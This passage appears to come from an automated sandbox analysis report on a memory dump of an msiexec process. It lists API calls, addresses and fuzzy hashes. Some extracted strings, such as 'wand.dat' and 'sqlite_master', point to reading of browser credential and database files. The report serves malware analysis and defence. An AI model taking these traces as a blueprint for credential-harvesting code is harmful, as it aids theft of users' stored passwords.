                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3384217055-0
                                                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                              • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                              APIs
                                                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                              • String ID:
                                                                                              • API String ID: 1889144086-0
                                                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                              • String ID:
                                                                                              • API String ID: 1661045500-0
                                                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                              APIs
                                                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                              Strings
                                                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                              • API String ID: 1297977491-2063813899
                                                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040560C
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                              • String ID: *.*$dat$wand.dat
                                                                                              • API String ID: 2618321458-1828844352
                                                                                              • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                              • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                              APIs
                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                              • wcslen.MSVCRT ref: 00410C74
                                                                                              • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1549203181-0
                                                                                              • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                              • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00412057
                                                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3550944819-0
                                                                                              • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                              • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                              APIs
                                                                                              • free.MSVCRT ref: 0040F561
                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$free
                                                                                              • String ID: g4@
                                                                                              • API String ID: 2888793982-2133833424
                                                                                              • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                              • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: @
                                                                                              • API String ID: 3510742995-2766056989
                                                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                              • memset.MSVCRT ref: 0040AF18
                                                                                              • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 1865533344-0
                                                                                              • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                              • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004144E7
                                                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                              • memset.MSVCRT ref: 0041451A
                                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1127616056-0
                                                                                              • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                              • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                              • memset.MSVCRT ref: 0042FED3
                                                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: sqlite_master
                                                                                              • API String ID: 438689982-3163232059
                                                                                              • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                              • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                              APIs
                                                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 3917621476-0
                                                                                              • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                              • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                              APIs
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                                                              • wcscat.MSVCRT ref: 0041101F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                              • String ID:
                                                                                              • API String ID: 822687973-0
                                                                                              • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                              • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                              • malloc.MSVCRT ref: 00417459
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                              • free.MSVCRT ref: 0041747F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 2605342592-0
                                                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                              • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                              • RegisterClassW.USER32(?), ref: 00412428
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                              • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2678498856-0
                                                                                              • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item
                                                                                              • String ID:
                                                                                              • API String ID: 3888421826-0
                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                              • String ID:
                                                                                              • API String ID: 3727323765-0
                                                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2754987064-0
                                                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
